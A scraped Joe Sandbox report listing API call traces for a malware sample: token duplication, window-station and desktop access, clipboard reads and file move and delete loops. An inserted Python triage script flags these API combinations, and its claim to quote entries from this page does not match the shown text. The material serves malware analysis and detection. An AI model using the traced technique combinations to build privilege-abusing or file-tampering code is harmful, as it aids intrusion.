                                                                                                                    • Part of subcall function 00E1B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E1B180
                                                                                                                    • Part of subcall function 00E1B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E1B1AD
                                                                                                                    • Part of subcall function 00E1B134: GetLastError.KERNEL32 ref: 00E1B1BA
                                                                                                                  • _memset.LIBCMT ref: 00E1AD08
                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E1AD5A
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00E1AD6B
                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E1AD82
                                                                                                                  • GetProcessWindowStation.USER32 ref: 00E1AD9B
                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00E1ADA5
                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E1ADBF
                                                                                                                    • Part of subcall function 00E1AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E1ACC0), ref: 00E1AB99
                                                                                                                    • Part of subcall function 00E1AB84: CloseHandle.KERNEL32(?,?,00E1ACC0), ref: 00E1ABAB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                  • String ID: $H*$default$winsta0
                                                                                                                  • API String ID: 2063423040-3938961404
                                                                                                                  • Opcode ID: 5ef90f3085b33b35ac2c66311699da568f01030370af31a58eceba15404d6f79
                                                                                                                  • Instruction ID: 4210358a7e92633c0dbf031035840b4ba27ff4494d10d1c52b77874728361353
                                                                                                                  • Opcode Fuzzy Hash: 5ef90f3085b33b35ac2c66311699da568f01030370af31a58eceba15404d6f79
                                                                                                                  • Instruction Fuzzy Hash: E981BCB1901209AFDF119FA4DC48AFEBBB9FF08348F085129F814B2161D7718E95DB62
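Added triage example (not part of the Joe Sandbox report or its IDA plugin): a small parser for the "APIs" / "Similarity" entries in the format shown above, which then flags the API combinations a reviewer would pull out of these traces by hand. The three entries it walks are the Sleep(000001F4) entry, the Shell_TrayWnd / AttachThreadInput / keybd_event entry and the DuplicateTokenEx / winsta0 / default-desktop entry. The rule names, the virtual-key table and the SAMPLE text (assembled here from lines on this page) are this example's own constructions, not report fields.

```python
"""Parse Joe Sandbox IDA-plugin function entries and flag notable API sets.

Added example; rule names, VK table and SAMPLE are constructed for the demo.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed from entries on this page (trimmed to the lines the parser needs).
SAMPLE = """\
APIs
• Sleep.KERNELBASE(000001F4), ref: 010BA541
Memory Dump Source
• Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
Similarity
• API ID: Sleep
• String ID:
• Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
APIs
• GetForegroundWindow.USER32(00000000,00000000), ref: 00DFEB4A
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E53AEA
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00E53B44
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00E53B6C
• keybd_event.USER32(00000012,00000000), ref: 00E53B77
• SetForegroundWindow.USER32(000000FF), ref: 00E53BA6
Strings
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• Opcode ID: b11088f9f326b595e83a278933f8ea1cc14e1b7560e40464106a19408eccb4fa
APIs
  • Part of subcall function 00E1B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E1B1AD
• _memset.LIBCMT ref: 00E1AD08
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E1AD5A
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E1AD82
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E1ADBF
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess
• String ID: $H*$default$winsta0
• Opcode ID: 5ef90f3085b33b35ac2c66311699da568f01030370af31a58eceba15404d6f79
"""

# "• [Part of subcall function ADDR: ]Name.MODULE[(args)], ref: ADDR"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
META_LINE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID|Opcode ID):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    subcall: str | None = None  # callee address when the call sits in a subcall


@dataclass
class FunctionEntry:
    calls: list[ApiCall] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""

    def api_names(self) -> set[str]:
        return {c.name for c in self.calls}


def parse_entries(text: str) -> list[FunctionEntry]:
    """Split the report text at each 'APIs' header and collect calls and IDs."""
    entries: list[FunctionEntry] = []
    cur: FunctionEntry | None = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
            continue
        m = META_LINE.match(line)
        if m:
            setattr(cur, m["key"].lower().replace(" ", "_"), m["val"].strip())
    return entries


# Constructed rules: a rule fires when every listed API appears in one entry.
RULES: dict[str, frozenset[str]] = {
    # attach to the foreground thread and inject a key so SetForegroundWindow is honoured
    "force_foreground": frozenset({"AttachThreadInput", "keybd_event", "SetForegroundWindow"}),
    # privilege adjustment, token duplication and explicit winsta0/desktop access
    "token_desktop_access": frozenset({"AdjustTokenPrivileges", "DuplicateTokenEx",
                                       "OpenWindowStationW", "OpenDesktopW"}),
    # enumerate files and move/copy/delete them in a loop
    "file_relocation_loop": frozenset({"FindFirstFileW", "FindNextFileW", "MoveFileW",
                                       "CopyFileW", "DeleteFileW"}),
}

VK_NAMES = {0x09: "VK_TAB", 0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"}


def flag_entry(entry: FunctionEntry) -> list[str]:
    present = entry.api_names()
    return [name for name, needed in RULES.items() if needed <= present]


def injected_keys(entry: FunctionEntry) -> list[str]:
    """Virtual-key names passed as the first (hex) argument to keybd_event."""
    keys = []
    for c in entry.calls:
        if c.name == "keybd_event" and c.args and c.args[0] != "?":
            vk = int(c.args[0], 16)
            keys.append(VK_NAMES.get(vk, f"VK_{vk:02X}"))
    return keys


def sleep_ms(entry: FunctionEntry) -> int:
    """Sum of literal Sleep() arguments (hex in the report) in milliseconds."""
    return sum(int(c.args[0], 16) for c in entry.calls
               if c.name == "Sleep" and c.args and c.args[0] != "?")


def triage(text: str) -> dict[str, list[str]]:
    """Map each entry's shortened Opcode ID to the rule names it triggers."""
    return {e.opcode_id[:16]: flag_entry(e) for e in parse_entries(text)}


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e.opcode_id[:16], e.api_id or "-", flag_entry(e), injected_keys(e), sleep_ms(e))
```

Run it on a saved copy of a report and the Opcode IDs it prints can be matched back to the entries above; 000001F4 decodes to a 500 ms sleep, and the 00000012 passed to keybd_event is VK_MENU (Alt), which is what the foreground-forcing sequence relies on.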
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E26EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E25FA6,?), ref: 00E26ED8
                                                                                                                    • Part of subcall function 00E26EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E25FA6,?), ref: 00E26EF1
                                                                                                                    • Part of subcall function 00E2725E: __wsplitpath.LIBCMT ref: 00E2727B
                                                                                                                    • Part of subcall function 00E2725E: __wsplitpath.LIBCMT ref: 00E2728E
                                                                                                                    • Part of subcall function 00E272CB: GetFileAttributesW.KERNEL32(?,00E26019), ref: 00E272CC
                                                                                                                  • _wcscat.LIBCMT ref: 00E26149
                                                                                                                  • _wcscat.LIBCMT ref: 00E26167
                                                                                                                  • __wsplitpath.LIBCMT ref: 00E2618E
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00E261A4
                                                                                                                  • _wcscpy.LIBCMT ref: 00E26209
                                                                                                                  • _wcscat.LIBCMT ref: 00E2621C
                                                                                                                  • _wcscat.LIBCMT ref: 00E2622F
                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00E2625D
                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00E2626E
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00E26289
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00E26298
                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 00E262AD
                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00E262BE
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E262E1
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E262FD
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E2630B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 1917200108-1173974218
                                                                                                                  • Opcode ID: 9592800f4f1798828c6470e96c4898a6f2492184242cb2879b6bbe6c62dbd166
                                                                                                                  • Instruction ID: 9c884307f26f653b062760a7918876e6430011f61eac1852253e186e27510454
                                                                                                                  • Opcode Fuzzy Hash: 9592800f4f1798828c6470e96c4898a6f2492184242cb2879b6bbe6c62dbd166
                                                                                                                  • Instruction Fuzzy Hash: 40514172D0812CAACB21EB91DC44EEB77FCAF05304F0511E6E585F2151DE7697898FA4
                                                                                                                  APIs
                                                                                                                  • OpenClipboard.USER32(00E7DC00), ref: 00E36B36
                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E36B44
                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00E36B4C
                                                                                                                  • CloseClipboard.USER32 ref: 00E36B58
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00E36B74
                                                                                                                  • CloseClipboard.USER32 ref: 00E36B7E
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00E36B93
                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00E36BA0
                                                                                                                  • GetClipboardData.USER32(00000001), ref: 00E36BA8
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00E36BB5
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00E36BE9
                                                                                                                  • CloseClipboard.USER32 ref: 00E36CF6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3222323430-0
                                                                                                                  • Opcode ID: fae2c0e33a81bf182ea1b05e7a44e08f1d9736c54ba16056a12c24511f2367ee
                                                                                                                  • Instruction ID: 66f361825e9913b56c0adcc86d8e8c43fade55a2027b59f79a951de4a2de636b
                                                                                                                  • Opcode Fuzzy Hash: fae2c0e33a81bf182ea1b05e7a44e08f1d9736c54ba16056a12c24511f2367ee
                                                                                                                  • Instruction Fuzzy Hash: A8518F312042016FD311AB66ED5AF6FBBA8EF84B54F405029F656F61A1DFA0D809CB62
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00E2F62B
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E2F67F
                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E2F6A4
                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E2F6BB
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E2F6E2
                                                                                                                  • __swprintf.LIBCMT ref: 00E2F72E
                                                                                                                  • __swprintf.LIBCMT ref: 00E2F767
                                                                                                                  • __swprintf.LIBCMT ref: 00E2F7BB
                                                                                                                    • Part of subcall function 00E0172B: __woutput_l.LIBCMT ref: 00E01784
                                                                                                                  • __swprintf.LIBCMT ref: 00E2F809
                                                                                                                  • __swprintf.LIBCMT ref: 00E2F858
                                                                                                                  • __swprintf.LIBCMT ref: 00E2F8A7
                                                                                                                  • __swprintf.LIBCMT ref: 00E2F8F6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                  • API String ID: 835046349-2428617273
                                                                                                                  • Opcode ID: e2dc5ee7d0d7c15f324c8f06610db84dc965b69cd2792bea6cb57fbc046ca4d7
                                                                                                                  • Instruction ID: c1d76d028db58b532f6d5d73c6a7e956f21a29946b9f16a085b29696244b06ff
                                                                                                                  • Opcode Fuzzy Hash: e2dc5ee7d0d7c15f324c8f06610db84dc965b69cd2792bea6cb57fbc046ca4d7
                                                                                                                  • Instruction Fuzzy Hash: B9A13CB2408344ABC310EBA5CC85DBFB7ECEF98704F44582AF68592191EB70D949CB72
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E31B50
                                                                                                                  • _wcscmp.LIBCMT ref: 00E31B65
                                                                                                                  • _wcscmp.LIBCMT ref: 00E31B7C
                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00E31B8E
                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00E31BA8
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00E31BC0
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E31BCB
                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00E31BE7
                                                                                                                  • _wcscmp.LIBCMT ref: 00E31C0E
                                                                                                                  • _wcscmp.LIBCMT ref: 00E31C25
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E31C37
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00E939FC), ref: 00E31C55
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E31C5F
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E31C6C
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E31C7C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 1803514871-438819550
                                                                                                                  • Opcode ID: 3a22b29a3252f6adaec837d696c94cf2c96a8f8b038a414fbf1f72cde025e60f
                                                                                                                  • Instruction ID: 19b7748981533e90567245b3dbe22c3cb7efdc2def9c119aed3ffac402da3745
                                                                                                                  • Opcode Fuzzy Hash: 3a22b29a3252f6adaec837d696c94cf2c96a8f8b038a414fbf1f72cde025e60f
                                                                                                                  • Instruction Fuzzy Hash: 7D31C531A05219AECF149BB1EC4DBDEBBECAF45354F106199E811F3090EBB0DA85CA64
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 00E4F37A
                                                                                                                    • Part of subcall function 00E4D7DE: ClientToScreen.USER32(?,?), ref: 00E4D807
                                                                                                                    • Part of subcall function 00E4D7DE: GetWindowRect.USER32(?,?), ref: 00E4D87D
                                                                                                                    • Part of subcall function 00E4D7DE: PtInRect.USER32(?,?,00E4ED5A), ref: 00E4D88D
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00E4F3E3
                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E4F3EE
                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E4F411
                                                                                                                  • _wcscat.LIBCMT ref: 00E4F441
                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E4F458
                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00E4F471
                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00E4F488
                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00E4F4AA
                                                                                                                  • DragFinish.SHELL32(?), ref: 00E4F4B1
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00E4F59C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                  • API String ID: 2166380349-3440237614
                                                                                                                  • Opcode ID: 6a99a73d53a8badc4fb69bbe2a71173fa5573d14a7a8e86d4fa13731b50e1774
                                                                                                                  • Instruction ID: fcc2a0da74f5f8c36b63b33fb947534f0071e2a5bb4377a6f3dc90bf294796eb
                                                                                                                  • Opcode Fuzzy Hash: 6a99a73d53a8badc4fb69bbe2a71173fa5573d14a7a8e86d4fa13731b50e1774
                                                                                                                  • Instruction Fuzzy Hash: DB616B71508304AFC711EF65DC85EAFBBF8EF89750F400A1EF595A21A1DB709A09CB62
                                                                                                                  APIs
                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00E309DF
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E309EF
                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E309FB
                                                                                                                  • __wsplitpath.LIBCMT ref: 00E30A59
                                                                                                                  • _wcscat.LIBCMT ref: 00E30A71
                                                                                                                  • _wcscat.LIBCMT ref: 00E30A83
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E30A98
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E30AAC
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E30ADE
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E30AFF
                                                                                                                  • _wcscpy.LIBCMT ref: 00E30B0B
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E30B4A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 3566783562-438819550
                                                                                                                  • Opcode ID: 00bc25135906f0cc92defdb24ffdeb924804c195159c61c8a2125e17898c8963
                                                                                                                  • Instruction ID: a29a05a26f3fca0d6d511fc00f83b4194aaec6bad2490c8eac5f3bb4b26784e8
                                                                                                                  • Opcode Fuzzy Hash: 00bc25135906f0cc92defdb24ffdeb924804c195159c61c8a2125e17898c8963
                                                                                                                  • Instruction Fuzzy Hash: EA6179725083059FD710EF61C854AAEB7E8FF89314F04891EF989E7251DB31E945CBA2
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E4EF3B
                                                                                                                  • GetFocus.USER32 ref: 00E4EF4B
                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00E4EF56
                                                                                                                  • _memset.LIBCMT ref: 00E4F081
                                                                                                                  • GetMenuItemInfoW.USER32 ref: 00E4F0AC
                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00E4F0CC
                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00E4F0DF
                                                                                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00E4F113
                                                                                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00E4F15B
                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E4F193
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00E4F1C8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
